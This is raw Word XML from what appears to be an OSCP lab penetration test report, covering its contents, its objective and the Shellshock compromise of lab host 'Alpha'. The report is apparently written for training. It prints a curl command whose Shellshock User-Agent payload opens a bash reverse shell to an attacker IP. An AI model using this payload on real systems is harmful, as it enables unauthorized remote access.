              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc92471637 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D658036" w14:textId="056C4977" w:rsidR="00CD5102" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:lang w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc92471638" w:history="1">
            <w:r w:rsidR="00CD5102" w:rsidRPr="0083700F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. General Course Information</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc92471638 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39F4A1C9" w14:textId="5B32BB2B" w:rsidR="00CD5102" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:lang w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc92471639" w:history="1">
            <w:r w:rsidR="00CD5102" w:rsidRPr="0083700F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Getting Comfortable with Kali Linux</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc92471639 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="78EF73C2" w14:textId="36A73302" w:rsidR="00CD5102" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc92471640" w:history="1">
            <w:r w:rsidR="00CD5102" w:rsidRPr="0083700F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.6 - Kali Documentation</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc92471640 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1538CE38" w14:textId="766622FF" w:rsidR="00CD5102" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc92471641" w:history="1">
            <w:r w:rsidR="00CD5102" w:rsidRPr="0083700F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4.3.4 - Finding Files in Kali Linux</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc92471641 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F4BEDD2" w14:textId="2C4134D4" w:rsidR="00CD5102" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc92471642" w:history="1">
            <w:r w:rsidR="00CD5102" w:rsidRPr="0083700F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5.3 - Managing Kali Linux Services</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc92471642 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5EEF62F6" w14:textId="04ACE1C9" w:rsidR="00CD5102" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc92471643" w:history="1">
            <w:r w:rsidR="00CD5102" w:rsidRPr="0083700F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.6.6.1 - dpkg</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc92471643 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00CD5102">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57E43B74" w14:textId="20B450C2" w:rsidR="003A61DB" w:rsidRDefault="003A61DB" w:rsidP="186B290E">
          <w:r w:rsidRPr="186B290E">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:bookmarkStart w:id="0" w:name="_Toc59959346" w:displacedByCustomXml="next"/>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="41390EF0" w14:textId="1BF582C0" w:rsidR="001D52DF" w:rsidRDefault="001D52DF" w:rsidP="001D52DF">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-ZA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A5C895" w14:textId="77777777" w:rsidR="001D52DF" w:rsidRDefault="001D52DF" w:rsidP="001D52DF">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-ZA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F38AC87" w14:textId="77777777" w:rsidR="00BD54EE" w:rsidRDefault="00BD54EE" w:rsidP="186B290E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Cambria"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="en-ZA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc92471625"/>
    </w:p>
    <w:p w14:paraId="5E4FF078" w14:textId="5ECA3AA5" w:rsidR="004C32FD" w:rsidRPr="008E2D2A" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:rFonts w:eastAsia="Cambria"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="en-ZA"/>
        </w:rPr>
        <w:t>Offensive Security Lab Penetration Test Report</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="3BC91817" w14:textId="5F27ED18" w:rsidR="004C32FD" w:rsidRPr="002B5C2F" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc59959348"/>
      <w:bookmarkStart w:id="3" w:name="_Toc92471626"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1. Objective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="09F52CB3" w14:textId="7B1F2BC8" w:rsidR="000E0759" w:rsidRDefault="186B290E" w:rsidP="000E0759">
      <w:bookmarkStart w:id="4" w:name="_Toc59959350"/>
      <w:r>
        <w:t xml:space="preserve">OS-XXXXXX was tasked with performing an internal penetration test towards Offensive Security Labs. An internal penetration test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Security’s internal lab systems – the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>THINC.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> domain. The overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDCAE4B" w14:textId="4D261200" w:rsidR="186B290E" w:rsidRDefault="186B290E"/>
    <w:p w14:paraId="409B5167" w14:textId="5D1D5940" w:rsidR="00052FCF" w:rsidRDefault="186B290E" w:rsidP="000E0759">
      <w:r>
        <w:t>When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Security’s network. When performing the attacks, OS-XXXXXX was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations.  During the testing, OS-XXXXXX had administrative level access to multiple systems. All systems were successfully exploited and access granted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264333EB" w14:textId="77777777" w:rsidR="004F5F59" w:rsidRDefault="004F5F59" w:rsidP="000E0759">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58E85A08" w14:textId="7F6D195A" w:rsidR="00772DF2" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc92471627"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Lab Network</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="17728B28" w14:textId="589340B9" w:rsidR="00854D15" w:rsidRDefault="00854D15" w:rsidP="00854D15"/>
    <w:p w14:paraId="2426DCB7" w14:textId="0577C4EC" w:rsidR="00854D15" w:rsidRDefault="00854D15" w:rsidP="00854D15">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Offensive Security Complete Guide machines (alpha and beta) may not be included in your lab report, they are for </w:t>
      </w:r>
      <w:r w:rsidR="00BD54EE">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>demonstration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> purposes only. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4841659E" w14:textId="77777777" w:rsidR="00854D15" w:rsidRDefault="00854D15" w:rsidP="00854D15">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6240A53E" w14:textId="0FE43D30" w:rsidR="00854D15" w:rsidRDefault="00854D15" w:rsidP="00854D15">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">For more information regarding the Bonus Points requirements, please visit the following URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00E56127">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06600D9F" w14:textId="77777777" w:rsidR="00854D15" w:rsidRPr="00854D15" w:rsidRDefault="00854D15" w:rsidP="00854D15"/>
    <w:p w14:paraId="06AFAE40" w14:textId="77777777" w:rsidR="00772DF2" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc92471628"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>10.11.1.71 – Alpha</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="2D515C81" w14:textId="7978604F" w:rsidR="00772DF2" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-ZA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc92471629"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-ZA"/>
        </w:rPr>
        <w:t>Initial Access – Shellshock on Apache’s CGI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-ZA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A13A12D" w14:textId="77777777" w:rsidR="00B96009" w:rsidRPr="00B96009" w:rsidRDefault="00B96009" w:rsidP="00B96009">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-ZA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D898CC" w14:textId="0D8DD2B2" w:rsidR="00772DF2" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>After inspecting the HTTP headers of the landing page on port 80 we discovered that it is running under Apache/2.4.7 (Ubuntu) and PHP/5.5.9-1ubuntu4.4. We can confirm the presence of a CGI-bin and a possible Shellshock arbitrary code execution vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="007204CC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="007204CC" w:rsidRPr="007204CC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>EDB 34900</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007204CC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> by running a directory brute-forcing attack or using a vulnerability scanner such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can interact with the script directly to receive a reverse shell on our attacker machine: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71164FFD" w14:textId="580EFF68" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="186B290E" w14:paraId="59D6654B" w14:textId="77777777" w:rsidTr="186B290E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="00E1BF6E" w14:textId="281D6CC2" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:color w:val="C8C3BC"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -H </w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">"User-Agent: () </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>{ :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>; }; /bin/bash -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/192.168.119.121/443 0&gt;&amp;1"</w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId11">
              <w:r w:rsidRPr="186B290E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
